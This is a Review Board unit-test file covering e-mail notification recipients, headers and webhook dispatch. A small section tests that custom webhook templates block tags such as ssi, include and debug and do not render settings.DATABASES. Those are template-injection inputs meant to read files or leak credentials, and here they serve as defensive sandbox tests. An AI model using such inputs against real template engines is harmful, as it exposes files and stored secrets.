gt
stringclasses 1
value | context
stringlengths 2.49k
119k
|
|---|---|
from __future__ import unicode_literals
import logging
from django.conf import settings
from django.contrib.auth.models import User
from django.core import mail
from django.template import TemplateSyntaxError
from django.utils.datastructures import MultiValueDict
from django.utils.six.moves.urllib.request import urlopen
from djblets.siteconfig.models import SiteConfiguration
from djblets.testing.decorators import add_fixtures
from kgb import SpyAgency
from reviewboard.accounts.models import Profile, ReviewRequestVisit
from reviewboard.admin.siteconfig import load_site_config
from reviewboard.diffviewer.models import FileDiff
from reviewboard.notifications.email import (build_email_address,
build_recipients,
get_email_address_for_user,
get_email_addresses_for_group,
recipients_to_addresses,
send_review_mail)
from reviewboard.notifications.models import WebHookTarget
from reviewboard.notifications.webhooks import (FakeHTTPRequest,
dispatch_webhook_event,
render_custom_content)
from reviewboard.reviews.models import (Group,
Review,
ReviewRequest,
ReviewRequestDraft)
from reviewboard.scmtools.core import PRE_CREATION
from reviewboard.site.models import LocalSite
from reviewboard.testing import TestCase
_CONSOLE_EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
class EmailTestHelper(object):
def setUp(self):
super(EmailTestHelper, self).setUp()
mail.outbox = []
self.sender = 'noreply@example.com'
def assertValidRecipients(self, user_list, group_list=[]):
recipient_list = mail.outbox[0].to + mail.outbox[0].cc
self.assertEqual(len(recipient_list), len(user_list) + len(group_list))
for user in user_list:
self.assertTrue(get_email_address_for_user(
User.objects.get(username=user)) in recipient_list,
"user %s was not found in the recipient list" % user)
groups = Group.objects.filter(name__in=group_list, local_site=None)
for group in groups:
for address in get_email_addresses_for_group(group):
self.assertTrue(
address in recipient_list,
"group %s was not found in the recipient list" % address)
class UserEmailTests(EmailTestHelper, TestCase):
def setUp(self):
super(UserEmailTests, self).setUp()
siteconfig = SiteConfiguration.objects.get_current()
siteconfig.set("mail_send_new_user_mail", True)
siteconfig.save()
load_site_config()
def test_new_user_email(self):
"""
Testing sending an e-mail after a new user has successfully registered.
"""
new_user_info = {
'username': 'NewUser',
'password1': 'password',
'password2': 'password',
'email': 'newuser@example.com',
'first_name': 'New',
'last_name': 'User'
}
# Registration request have to be sent twice since djblets need to
# validate cookies on the second request.
self.client.get('/account/register/', new_user_info)
self.client.post('/account/register/', new_user_info)
siteconfig = SiteConfiguration.objects.get_current()
admin_name = siteconfig.get('site_admin_name')
admin_email_addr = siteconfig.get('site_admin_email')
self.assertEqual(len(mail.outbox), 1)
email = mail.outbox[0]
self.assertEqual(email.subject,
"New Review Board user registration for NewUser")
self.assertEqual(email.from_email, self.sender)
self.assertEqual(email.extra_headers['From'], settings.SERVER_EMAIL)
self.assertEqual(email.to[0], build_email_address(admin_name,
admin_email_addr))
class ReviewRequestEmailTests(EmailTestHelper, SpyAgency, TestCase):
"""Tests the e-mail support."""
fixtures = ['test_users']
def setUp(self):
super(ReviewRequestEmailTests, self).setUp()
siteconfig = SiteConfiguration.objects.get_current()
siteconfig.set("mail_send_review_mail", True)
siteconfig.set("mail_default_from", self.sender)
siteconfig.save()
load_site_config()
def test_new_review_request_email(self):
"""Testing sending an e-mail when creating a new review request"""
review_request = self.create_review_request(
summary='My test review request')
review_request.target_people.add(User.objects.get(username='grumpy'))
review_request.target_people.add(User.objects.get(username='doc'))
review_request.publish(review_request.submitter)
from_email = get_email_address_for_user(review_request.submitter)
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].from_email, self.sender)
self.assertEqual(mail.outbox[0].extra_headers['From'], from_email)
self.assertEqual(mail.outbox[0].subject,
'Review Request %s: My test review request'
% review_request.pk)
self.assertValidRecipients(['grumpy', 'doc'])
message = mail.outbox[0].message()
self.assertEqual(message['Sender'],
self._get_sender(review_request.submitter))
def test_review_request_email_local_site_group(self):
"""Testing sending email when a group member is part of a Local Site"""
# This was bug 3581.
local_site = LocalSite.objects.create(name=self.local_site_name)
group = self.create_review_group()
user = User.objects.get(username='grumpy')
local_site.users.add(user)
local_site.admins.add(user)
local_site.save()
group.users.add(user)
group.save()
review_request = self.create_review_request()
review_request.target_groups.add(group)
review_request.publish(review_request.submitter)
self.assertEqual(len(mail.outbox), 1)
self.assertValidRecipients(['doc', 'grumpy'])
def test_review_email(self):
"""Testing sending an e-mail when replying to a review request"""
review_request = self.create_review_request(
summary='My test review request')
review_request.target_people.add(User.objects.get(username='grumpy'))
review_request.target_people.add(User.objects.get(username='doc'))
review_request.publish(review_request.submitter)
# Clear the outbox.
mail.outbox = []
review = self.create_review(review_request=review_request)
review.publish()
from_email = get_email_address_for_user(review.user)
self.assertEqual(len(mail.outbox), 1)
email = mail.outbox[0]
self.assertEqual(email.from_email, self.sender)
self.assertEqual(email.extra_headers['From'], from_email)
self.assertEqual(email._headers['X-ReviewBoard-URL'],
'http://example.com/')
self.assertEqual(email._headers['X-ReviewRequest-URL'],
'http://example.com/r/%s/'
% review_request.display_id)
self.assertEqual(email.subject,
'Re: Review Request %s: My test review request'
% review_request.display_id)
self.assertValidRecipients([
review_request.submitter.username,
'grumpy',
'doc',
])
message = email.message()
self.assertEqual(message['Sender'], self._get_sender(review.user))
@add_fixtures(['test_site'])
def test_review_email_with_site(self):
"""Testing sending an e-mail when replying to a review request
on a Local Site
"""
review_request = self.create_review_request(
summary='My test review request',
with_local_site=True)
review_request.target_people.add(User.objects.get(username='grumpy'))
review_request.target_people.add(User.objects.get(username='doc'))
review_request.publish(review_request.submitter)
# Ensure all the reviewers are on the site.
site = review_request.local_site
site.users.add(*list(review_request.target_people.all()))
# Clear the outbox.
mail.outbox = []
review = self.create_review(review_request=review_request)
review.publish()
from_email = get_email_address_for_user(review.user)
self.assertEqual(len(mail.outbox), 1)
email = mail.outbox[0]
self.assertEqual(email.from_email, self.sender)
self.assertEqual(email.extra_headers['From'], from_email)
self.assertEqual(email._headers['X-ReviewBoard-URL'],
'http://example.com/s/local-site-1/')
self.assertEqual(email._headers['X-ReviewRequest-URL'],
'http://example.com/s/local-site-1/r/%s/'
% review_request.display_id)
self.assertEqual(email.subject,
'Re: Review Request %s: My test review request'
% review_request.display_id)
self.assertValidRecipients([
review_request.submitter.username,
'grumpy',
'doc',
])
message = email.message()
self.assertEqual(message['Sender'], self._get_sender(review.user))
def test_profile_should_send_email_setting(self):
"""Testing the Profile.should_send_email setting"""
grumpy = User.objects.get(username='grumpy')
profile = grumpy.get_profile()
profile.should_send_email = False
profile.save()
review_request = self.create_review_request(
summary='My test review request')
review_request.target_people.add(grumpy)
review_request.target_people.add(User.objects.get(username='doc'))
review_request.publish(review_request.submitter)
self.assertEqual(len(mail.outbox), 1)
self.assertValidRecipients(['doc'])
def test_review_close_no_email(self):
"""Tests e-mail is not generated when a review is closed and e-mail
setting is False
"""
review_request = self.create_review_request()
review_request.publish(review_request.submitter)
# Clear the outbox.
mail.outbox = []
review_request.close(ReviewRequest.SUBMITTED, review_request.submitter)
# Verify that no email is generated as option is false by default
self.assertEqual(len(mail.outbox), 0)
def test_review_close_with_email(self):
"""Tests e-mail is generated when a review is closed and e-mail setting
is True
"""
siteconfig = SiteConfiguration.objects.get_current()
siteconfig.set("mail_send_review_close_mail", True)
siteconfig.save()
load_site_config()
review_request = self.create_review_request()
review_request.publish(review_request.submitter)
# Clear the outbox.
mail.outbox = []
review_request.close(ReviewRequest.SUBMITTED, review_request.submitter)
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0].message()
self.assertTrue("This change has been marked as submitted"
in message.as_string())
# Reset settings for review close requests
siteconfig.set("mail_send_review_close_mail", False)
siteconfig.save()
load_site_config()
def test_review_to_submitter_only(self):
"""Test that e-mails from reviews published to the submitter only will
only go to the submitter and the reviewer
"""
siteconfig = SiteConfiguration.objects.get_current()
siteconfig.set('mail_send_review_mail', True)
siteconfig.save()
review_request = self.create_review_request(public=True, publish=False)
review_request.target_people = [User.objects.get(username='grumpy')]
review_request.save()
review = self.create_review(review_request=review_request,
publish=False)
review.publish(to_submitter_only=True)
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertEqual(message.cc, [])
self.assertEqual(len(message.to), 2)
self.assertEqual(
set(message.to),
set([get_email_address_for_user(review.user),
get_email_address_for_user(review_request.submitter)]))
def test_review_reply_email(self):
"""Testing sending an e-mail when replying to a review"""
review_request = self.create_review_request(
summary='My test review request')
review_request.publish(review_request.submitter)
base_review = self.create_review(review_request=review_request)
base_review.publish()
# Clear the outbox.
mail.outbox = []
reply = self.create_reply(base_review)
reply.publish()
from_email = get_email_address_for_user(reply.user)
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].from_email, self.sender)
self.assertEqual(mail.outbox[0].extra_headers['From'], from_email)
self.assertEqual(mail.outbox[0].subject,
'Re: Review Request %s: My test review request'
% review_request.pk)
self.assertValidRecipients([
review_request.submitter.username,
base_review.user.username,
reply.user.username,
])
message = mail.outbox[0].message()
self.assertEqual(message['Sender'], self._get_sender(reply.user))
def test_update_review_request_email(self):
"""Testing sending an e-mail when updating a review request"""
group = Group.objects.create(name='devgroup',
mailing_list='devgroup@example.com')
review_request = self.create_review_request(
summary='My test review request')
review_request.target_groups.add(group)
review_request.email_message_id = "junk"
review_request.publish(review_request.submitter)
from_email = get_email_address_for_user(review_request.submitter)
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].from_email, self.sender)
self.assertEqual(mail.outbox[0].extra_headers['From'], from_email)
self.assertEqual(mail.outbox[0].subject,
'Re: Review Request %s: My test review request'
% review_request.pk)
self.assertValidRecipients([review_request.submitter.username],
['devgroup'])
message = mail.outbox[0].message()
self.assertEqual(message['Sender'],
self._get_sender(review_request.submitter))
def test_add_reviewer_review_request_email(self):
"""Testing limited e-mail recipients
when adding a reviewer to an existing review request
"""
review_request = self.create_review_request(
summary='My test review request',
public=True)
review_request.email_message_id = "junk"
review_request.target_people.add(User.objects.get(username='dopey'))
review_request.save()
draft = ReviewRequestDraft.create(review_request)
draft.target_people.add(User.objects.get(username='grumpy'))
draft.publish(user=review_request.submitter)
from_email = get_email_address_for_user(review_request.submitter)
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].from_email, self.sender)
self.assertEqual(mail.outbox[0].extra_headers['From'], from_email)
self.assertEqual(mail.outbox[0].subject,
'Re: Review Request %s: My test review request'
% review_request.pk)
# The only included users should be the submitter and 'grumpy' (not
# 'dopey', since he was already included on the review request earlier)
self.assertValidRecipients([review_request.submitter.username,
'grumpy'])
message = mail.outbox[0].message()
self.assertEqual(message['Sender'],
self._get_sender(review_request.submitter))
def test_add_group_review_request_email(self):
"""Testing limited e-mail recipients
when adding a group to an existing review request
"""
existing_group = Group.objects.create(
name='existing', mailing_list='existing@example.com')
review_request = self.create_review_request(
summary='My test review request',
public=True)
review_request.email_message_id = "junk"
review_request.target_groups.add(existing_group)
review_request.target_people.add(User.objects.get(username='dopey'))
review_request.save()
new_group = Group.objects.create(name='devgroup',
mailing_list='devgroup@example.com')
draft = ReviewRequestDraft.create(review_request)
draft.target_groups.add(new_group)
draft.publish(user=review_request.submitter)
from_email = get_email_address_for_user(review_request.submitter)
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].from_email, self.sender)
self.assertEqual(mail.outbox[0].extra_headers['From'], from_email)
self.assertEqual(mail.outbox[0].subject,
'Re: Review Request %s: My test review request'
% review_request.pk)
# The only included users should be the submitter and 'devgroup' (not
# 'dopey' or 'existing', since they were already included on the
# review request earlier)
self.assertValidRecipients([review_request.submitter.username],
['devgroup'])
message = mail.outbox[0].message()
self.assertEqual(message['Sender'],
self._get_sender(review_request.submitter))
def test_limited_recipients_other_fields(self):
"""Testing that recipient limiting only happens when adding reviewers
"""
review_request = self.create_review_request(
summary='My test review request',
public=True)
review_request.email_message_id = "junk"
review_request.target_people.add(User.objects.get(username='dopey'))
review_request.save()
draft = ReviewRequestDraft.create(review_request)
draft.summary = 'Changed summary'
draft.target_people.add(User.objects.get(username='grumpy'))
draft.publish(user=review_request.submitter)
from_email = get_email_address_for_user(review_request.submitter)
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].from_email, self.sender)
self.assertEqual(mail.outbox[0].extra_headers['From'], from_email)
self.assertEqual(mail.outbox[0].subject,
'Re: Review Request %s: Changed summary'
% review_request.pk)
self.assertValidRecipients([review_request.submitter.username,
'dopey', 'grumpy'])
message = mail.outbox[0].message()
self.assertEqual(message['Sender'],
self._get_sender(review_request.submitter))
def test_limited_recipients_no_email(self):
"""Testing limited e-mail recipients when operation results in zero
recipients
"""
review_request = self.create_review_request(
summary='My test review request',
public=True)
review_request.email_message_id = "junk"
review_request.target_people.add(User.objects.get(username='dopey'))
review_request.save()
profile, is_new = Profile.objects.get_or_create(
user=review_request.submitter)
profile.should_send_own_updates = False
profile.save()
draft = ReviewRequestDraft.create(review_request)
draft.target_people.remove(User.objects.get(username='dopey'))
draft.publish(user=review_request.submitter)
self.assertEqual(len(mail.outbox), 0)
def test_recipients_with_muted_review_requests(self):
"""Testing e-mail recipients when users mute a review request"""
dopey = User.objects.get(username='dopey')
admin = User.objects.get(username='admin')
group = Group.objects.create(name='group')
group.users.add(admin)
group.save()
review_request = self.create_review_request(
summary='My test review request',
public=True)
review_request.target_people.add(dopey)
review_request.target_people.add(User.objects.get(username='grumpy'))
review_request.target_groups.add(group)
review_request.save()
visit = self.create_visit(review_request, ReviewRequestVisit.MUTED,
dopey)
visit.save()
visit = self.create_visit(review_request, ReviewRequestVisit.MUTED,
admin)
visit.save()
draft = ReviewRequestDraft.create(review_request)
draft.summary = 'Summary changed'
draft.publish(user=review_request.submitter)
self.assertEqual(len(mail.outbox), 1)
self.assertValidRecipients(['doc', 'grumpy'])
def test_local_site_user_filters(self):
"""Testing sending e-mails and filtering out users not on a local site
"""
test_site = LocalSite.objects.create(name=self.local_site_name)
site_user1 = User.objects.create(
username='site_user1',
email='site_user1@example.com')
site_user2 = User.objects.create(
username='site_user2',
email='site_user2@example.com')
site_user3 = User.objects.create(
username='site_user3',
email='site_user3@example.com')
site_user4 = User.objects.create(
username='site_user4',
email='site_user4@example.com')
site_user5 = User.objects.create(
username='site_user5',
email='site_user5@example.com')
non_site_user1 = User.objects.create(
username='non_site_user1',
email='non_site_user1@example.com')
non_site_user2 = User.objects.create(
username='non_site_user2',
email='non_site_user2@example.com')
non_site_user3 = User.objects.create(
username='non_site_user3',
email='non_site_user3@example.com')
test_site.admins.add(site_user1)
test_site.users.add(site_user2)
test_site.users.add(site_user3)
test_site.users.add(site_user4)
test_site.users.add(site_user5)
group = Group.objects.create(name='my-group',
display_name='My Group',
local_site=test_site)
group.users.add(site_user5)
group.users.add(non_site_user3)
review_request = self.create_review_request(with_local_site=True,
local_id=123)
review_request.email_message_id = "junk"
review_request.target_people = [site_user1, site_user2, site_user3,
non_site_user1]
review_request.target_groups = [group]
review = Review.objects.create(review_request=review_request,
user=site_user4)
review.publish()
review = Review.objects.create(review_request=review_request,
user=non_site_user2)
review.publish()
from_email = get_email_address_for_user(review_request.submitter)
# Now that we're set up, send another e-mail.
mail.outbox = []
review_request.publish(review_request.submitter)
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].from_email, self.sender)
self.assertEqual(mail.outbox[0].extra_headers['From'], from_email)
self.assertValidRecipients(
['site_user1', 'site_user2', 'site_user3', 'site_user4',
'site_user5', review_request.submitter.username], [])
message = mail.outbox[0].message()
self.assertEqual(message['Sender'],
self._get_sender(review_request.submitter))
def test_review_request_email_with_unicode_summary(self):
"""Testing sending a review request e-mail with a unicode subject"""
self.spy_on(logging.exception)
with self.settings(EMAIL_BACKEND=_CONSOLE_EMAIL_BACKEND):
review_request = self.create_review_request()
review_request.summary = '\ud83d\ude04'
review_request.target_people.add(User.objects.get(
username='grumpy'))
review_request.target_people.add(User.objects.get(username='doc'))
review_request.publish(review_request.submitter)
self.assertIsNotNone(review_request.email_message_id)
self.assertFalse(logging.exception.spy.called)
def test_review_request_email_with_unicode_description(self):
"""Testing sending a review request e-mail with a unicode
description
"""
self.spy_on(logging.exception)
with self.settings(EMAIL_BACKEND=_CONSOLE_EMAIL_BACKEND):
review_request = self.create_review_request()
review_request.description = '\ud83d\ude04'
review_request.target_people.add(
User.objects.get(username='grumpy'))
review_request.target_people.add(
User.objects.get(username='doc'))
review_request.publish(review_request.submitter)
self.assertIsNotNone(review_request.email_message_id)
self.assertFalse(logging.exception.spy.called)
@add_fixtures(['test_scmtools'])
def test_review_request_email_with_added_file(self):
"""Testing sending a review request e-mail with added files in the
diffset
"""
repository = self.create_repository(tool_name='Test')
review_request = self.create_review_request(repository=repository)
diffset = self.create_diffset(review_request=review_request)
filediff = self.create_filediff(diffset=diffset,
source_file='/dev/null',
source_revision=PRE_CREATION)
review_request.publish(review_request.submitter)
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertTrue('X-ReviewBoard-Diff-For' in message._headers)
diff_headers = message._headers.getlist('X-ReviewBoard-Diff-For')
self.assertEqual(len(diff_headers), 1)
self.assertFalse(filediff.source_file in diff_headers)
self.assertTrue(filediff.dest_file in diff_headers)
@add_fixtures(['test_scmtools'])
def test_review_request_email_with_deleted_file(self):
"""Testing sending a review request e-mail with deleted files in the
diffset
"""
repository = self.create_repository(tool_name='Test')
review_request = self.create_review_request(repository=repository)
diffset = self.create_diffset(review_request=review_request)
filediff = self.create_filediff(diffset=diffset,
dest_file='/dev/null',
status=FileDiff.DELETED)
review_request.publish(review_request.submitter)
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertTrue('X-ReviewBoard-Diff-For' in message._headers)
diff_headers = message._headers.getlist('X-ReviewBoard-Diff-For')
self.assertEqual(len(diff_headers), 1)
self.assertTrue(filediff.source_file in diff_headers)
self.assertFalse(filediff.dest_file in diff_headers)
@add_fixtures(['test_scmtools'])
def test_review_request_email_with_moved_file(self):
"""Testing sending a review request e-mail with moved files in the
diffset
"""
repository = self.create_repository(tool_name='Test')
review_request = self.create_review_request(repository=repository)
diffset = self.create_diffset(review_request=review_request)
filediff = self.create_filediff(diffset=diffset,
source_file='foo',
dest_file='bar',
status=FileDiff.MOVED)
review_request.publish(review_request.submitter)
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertTrue('X-ReviewBoard-Diff-For' in message._headers)
diff_headers = message._headers.getlist('X-ReviewBoard-Diff-For')
self.assertEqual(len(diff_headers), 2)
self.assertTrue(filediff.source_file in diff_headers)
self.assertTrue(filediff.dest_file in diff_headers)
@add_fixtures(['test_scmtools'])
def test_review_request_email_with_copied_file(self):
"""Testing sending a review request e-mail with copied files in the
diffset
"""
repository = self.create_repository(tool_name='Test')
review_request = self.create_review_request(repository=repository)
diffset = self.create_diffset(review_request=review_request)
filediff = self.create_filediff(diffset=diffset,
source_file='foo',
dest_file='bar',
status=FileDiff.COPIED)
review_request.publish(review_request.submitter)
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertTrue('X-ReviewBoard-Diff-For' in message._headers)
diff_headers = message._headers.getlist('X-ReviewBoard-Diff-For')
self.assertEqual(len(diff_headers), 2)
self.assertTrue(filediff.source_file in diff_headers)
self.assertTrue(filediff.dest_file in diff_headers)
@add_fixtures(['test_scmtools'])
def test_review_request_email_with_multiple_files(self):
"""Testing sending a review request e-mail with multiple files in the
diffset
"""
repository = self.create_repository(tool_name='Test')
review_request = self.create_review_request(repository=repository)
diffset = self.create_diffset(review_request=review_request)
filediffs = [
self.create_filediff(diffset=diffset,
source_file='foo',
dest_file='bar',
status=FileDiff.MOVED),
self.create_filediff(diffset=diffset,
source_file='baz',
dest_file='/dev/null',
status=FileDiff.DELETED)
]
review_request.publish(review_request.submitter)
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertTrue('X-ReviewBoard-Diff-For' in message._headers)
diff_headers = message._headers.getlist('X-ReviewBoard-Diff-For')
self.assertEqual(len(diff_headers), 3)
self.assertTrue(filediffs[0].source_file in diff_headers)
self.assertTrue(filediffs[0].dest_file in diff_headers)
self.assertTrue(filediffs[1].source_file in diff_headers)
self.assertFalse(filediffs[1].dest_file in diff_headers)
def test_extra_headers_dict(self):
"""Testing sending extra headers as a dict with an e-mail message"""
review_request = self.create_review_request()
submitter = review_request.submitter
send_review_mail(submitter,
review_request,
'Foo',
None,
[submitter],
[],
'notifications/review_request_email.txt',
'notifications/review_request_email.html',
extra_headers={
'X-Foo': 'Bar'
})
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertIn('X-Foo', message._headers)
self.assertEqual(message._headers['X-Foo'], 'Bar')
def test_extra_headers_multivalue_dict(self):
"""Testing sending extra headers as a MultiValueDict with an e-mail
message
"""
header_values = ['Bar', 'Baz']
review_request = self.create_review_request()
submitter = review_request.submitter
send_review_mail(review_request.submitter,
review_request,
'Foo',
None,
[submitter],
[],
'notifications/review_request_email.txt',
'notifications/review_request_email.html',
extra_headers=MultiValueDict({
'X-Foo': header_values,
}))
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertIn('X-Foo', message._headers)
self.assertEqual(set(message._headers.getlist('X-Foo')),
set(header_values))
def test_review_no_shipit_headers(self):
"""Testing sending a review e-mail without a 'Ship It!'"""
review_request = self.create_review_request(public=True)
self.create_review(review_request,
body_top=Review.SHIP_IT_TEXT,
body_bottom='',
publish=True)
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertNotIn('X-ReviewBoard-ShipIt', message._headers)
self.assertNotIn('X-ReviewBoard-ShipIt-Only', message._headers)
def test_review_shipit_only_headers(self):
"""Testing sending a review e-mail with only a 'Ship It!'"""
review_request = self.create_review_request(public=True)
self.create_review(review_request,
body_top=Review.SHIP_IT_TEXT,
body_bottom='',
ship_it=True,
publish=True)
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertIn('X-ReviewBoard-ShipIt', message._headers)
self.assertIn('X-ReviewBoard-ShipIt-Only', message._headers)
def test_review_shipit_only_headers_no_text(self):
"""Testing sending a review e-mail with only a 'Ship It!' and no text
"""
review_request = self.create_review_request(public=True)
self.create_review(review_request,
body_top='',
body_bottom='',
ship_it=True,
publish=True)
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertIn('X-ReviewBoard-ShipIt', message._headers)
self.assertIn('X-ReviewBoard-ShipIt-Only', message._headers)
def test_review_shipit_headers_custom_top_text(self):
"""Testing sending a review e-mail with a 'Ship It' and custom top text
"""
review_request = self.create_review_request(public=True)
self.create_review(review_request,
body_top='Some general information.',
body_bottom='',
ship_it=True,
publish=True)
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertIn('X-ReviewBoard-ShipIt', message._headers)
self.assertNotIn('X-ReviewBoard-ShipIt-Only', message._headers)
def test_review_shipit_headers_bottom_text(self):
"""Testing sending a review e-mail with a 'Ship It' and bottom text"""
review_request = self.create_review_request(public=True)
self.create_review(review_request,
body_top=Review.SHIP_IT_TEXT,
body_bottom='Some comments',
ship_it=True,
publish=True)
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertIn('X-ReviewBoard-ShipIt', message._headers)
self.assertNotIn('X-ReviewBoard-ShipIt-Only', message._headers)
@add_fixtures(['test_scmtools'])
def test_review_shipit_headers_comments(self):
"""Testing sending a review e-mail with a 'Ship It' and diff comments
"""
repository = self.create_repository(tool_name='Test')
review_request = self.create_review_request(repository=repository,
public=True)
diffset = self.create_diffset(review_request)
filediff = self.create_filediff(diffset)
review = self.create_review(review_request,
body_top=Review.SHIP_IT_TEXT,
body_bottom='',
ship_it=True,
publish=False)
self.create_diff_comment(review, filediff)
review.publish()
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertIn('X-ReviewBoard-ShipIt', message._headers)
self.assertNotIn('X-ReviewBoard-ShipIt-Only', message._headers)
def test_review_shipit_headers_attachment_comments(self):
"""Testing sending a review e-mail with a 'Ship It' and file attachment
comments
"""
review_request = self.create_review_request(public=True)
file_attachment = self.create_file_attachment(review_request)
review = self.create_review(review_request,
body_top=Review.SHIP_IT_TEXT,
body_bottom='',
ship_it=True,
publish=False)
self.create_file_attachment_comment(review, file_attachment)
review.publish()
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertIn('X-ReviewBoard-ShipIt', message._headers)
self.assertNotIn('X-ReviewBoard-ShipIt-Only', message._headers)
def test_review_shipit_headers_screenshot_comments(self):
"""Testing sending a review e-mail with a 'Ship It' and screenshot
comments
"""
review_request = self.create_review_request(public=True)
screenshot = self.create_screenshot(review_request)
review = self.create_review(review_request,
body_top=Review.SHIP_IT_TEXT,
body_bottom='',
ship_it=True,
publish=False)
self.create_screenshot_comment(review, screenshot)
review.publish()
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertIn('X-ReviewBoard-ShipIt', message._headers)
self.assertNotIn('X-ReviewBoard-ShipIt-Only', message._headers)
def _get_sender(self, user):
return build_email_address(user.get_full_name(), self.sender)
class WebHookCustomContentTests(TestCase):
"""Unit tests for render_custom_content."""
def test_with_valid_template(self):
"""Tests render_custom_content with a valid template"""
s = render_custom_content(
'{% if mybool %}{{s1}}{% else %}{{s2}}{% endif %}',
{
'mybool': True,
's1': 'Hi!',
's2': 'Bye!',
})
self.assertEqual(s, 'Hi!')
def test_with_blocked_block_tag(self):
"""Tests render_custom_content with blocked {% block %}"""
with self.assertRaisesMessage(TemplateSyntaxError,
"Invalid block tag: 'block'"):
render_custom_content('{% block foo %}{% endblock %})')
def test_with_blocked_debug_tag(self):
"""Tests render_custom_content with blocked {% debug %}"""
with self.assertRaisesMessage(TemplateSyntaxError,
"Invalid block tag: 'debug'"):
render_custom_content('{% debug %}')
def test_with_blocked_extends_tag(self):
"""Tests render_custom_content with blocked {% extends %}"""
with self.assertRaisesMessage(TemplateSyntaxError,
"Invalid block tag: 'extends'"):
render_custom_content('{% extends "base.html" %}')
def test_with_blocked_include_tag(self):
"""Tests render_custom_content with blocked {% include %}"""
with self.assertRaisesMessage(TemplateSyntaxError,
"Invalid block tag: 'include'"):
render_custom_content('{% include "base.html" %}')
def test_with_blocked_load_tag(self):
"""Tests render_custom_content with blocked {% load %}"""
with self.assertRaisesMessage(TemplateSyntaxError,
"Invalid block tag: 'load'"):
render_custom_content('{% load i18n %}')
def test_with_blocked_ssi_tag(self):
"""Tests render_custom_content with blocked {% ssi %}"""
with self.assertRaisesMessage(TemplateSyntaxError,
"Invalid block tag: 'ssi'"):
render_custom_content('{% ssi "foo.html" %}')
def test_with_unknown_vars(self):
"""Tests render_custom_content with unknown variables"""
s = render_custom_content('{{settings.DEBUG}};{{settings.DATABASES}}')
self.assertEqual(s, ';')
class WebHookDispatchTests(SpyAgency, TestCase):
"""Unit tests for dispatching webhooks."""
ENDPOINT_URL = 'http://example.com/endpoint/'
def test_dispatch_custom_payload(self):
"""Test dispatch_webhook_event with custom payload"""
custom_content = (
'{\n'
'{% for i in items %}'
' "item{{i}}": true{% if not forloop.last %},{% endif %}\n'
'{% endfor %}'
'}')
handler = WebHookTarget(events='my-event',
url=self.ENDPOINT_URL,
encoding=WebHookTarget.ENCODING_JSON,
use_custom_content=True,
custom_content=custom_content)
self._test_dispatch(
handler,
'my-event',
{
'items': [1, 2, 3],
},
'application/json',
('{\n'
' "item1": true,\n'
' "item2": true,\n'
' "item3": true\n'
'}'))
def test_dispatch_form_data(self):
"""Test dispatch_webhook_event with Form Data payload"""
handler = WebHookTarget(events='my-event',
url=self.ENDPOINT_URL,
encoding=WebHookTarget.ENCODING_FORM_DATA)
self._test_dispatch(
handler,
'my-event',
{
'items': [1, 2, 3],
},
'application/x-www-form-urlencoded',
'payload=%7B%22items%22%3A+%5B1%2C+2%2C+3%5D%7D')
def test_dispatch_json(self):
"""Test dispatch_webhook_event with JSON payload"""
handler = WebHookTarget(events='my-event',
url=self.ENDPOINT_URL,
encoding=WebHookTarget.ENCODING_JSON)
self._test_dispatch(
handler,
'my-event',
{
'items': [1, 2, 3],
},
'application/json',
'{"items": [1, 2, 3]}')
def test_dispatch_xml(self):
"""Test dispatch_webhook_event with XML payload"""
handler = WebHookTarget(events='my-event',
url=self.ENDPOINT_URL,
encoding=WebHookTarget.ENCODING_XML)
self._test_dispatch(
handler,
'my-event',
{
'items': [1, 2, 3],
},
'application/xml',
('<?xml version="1.0" encoding="utf-8"?>\n'
'<rsp>\n'
' <items>\n'
' <array>\n'
' <item>1</item>\n'
' <item>2</item>\n'
' <item>3</item>\n'
' </array>\n'
' </items>\n'
'</rsp>'))
def test_dispatch_with_secret(self):
"""Test dispatch_webhook_event with HMAC secret"""
handler = WebHookTarget(events='my-event',
url=self.ENDPOINT_URL,
encoding=WebHookTarget.ENCODING_JSON,
secret='foobar123')
self._test_dispatch(
handler,
'my-event',
{
'items': [1, 2, 3],
},
'application/json',
'{"items": [1, 2, 3]}',
'sha1=cf27ad0de6b5f0c4e77e45bec9f4846e')
def _test_dispatch(self, handler, event, payload, expected_content_type,
expected_data, expected_sig_header=None):
def _urlopen(request):
self.assertEqual(request.get_full_url(), self.ENDPOINT_URL)
self.assertEqual(request.headers['X-reviewboard-event'], event)
self.assertEqual(request.headers['Content-type'],
expected_content_type)
self.assertEqual(request.data, expected_data)
self.assertEqual(request.headers['Content-length'],
len(expected_data))
if expected_sig_header:
self.assertIn('X-hub-signature', request.headers)
self.assertEqual(request.headers['X-hub-signature'],
expected_sig_header)
else:
self.assertNotIn('X-hub-signature', request.headers)
self.spy_on(urlopen, call_fake=_urlopen)
request = FakeHTTPRequest(None)
dispatch_webhook_event(request, [handler], event, payload)
class WebHookTargetManagerTests(TestCase):
"""Unit tests for WebHookTargetManager."""
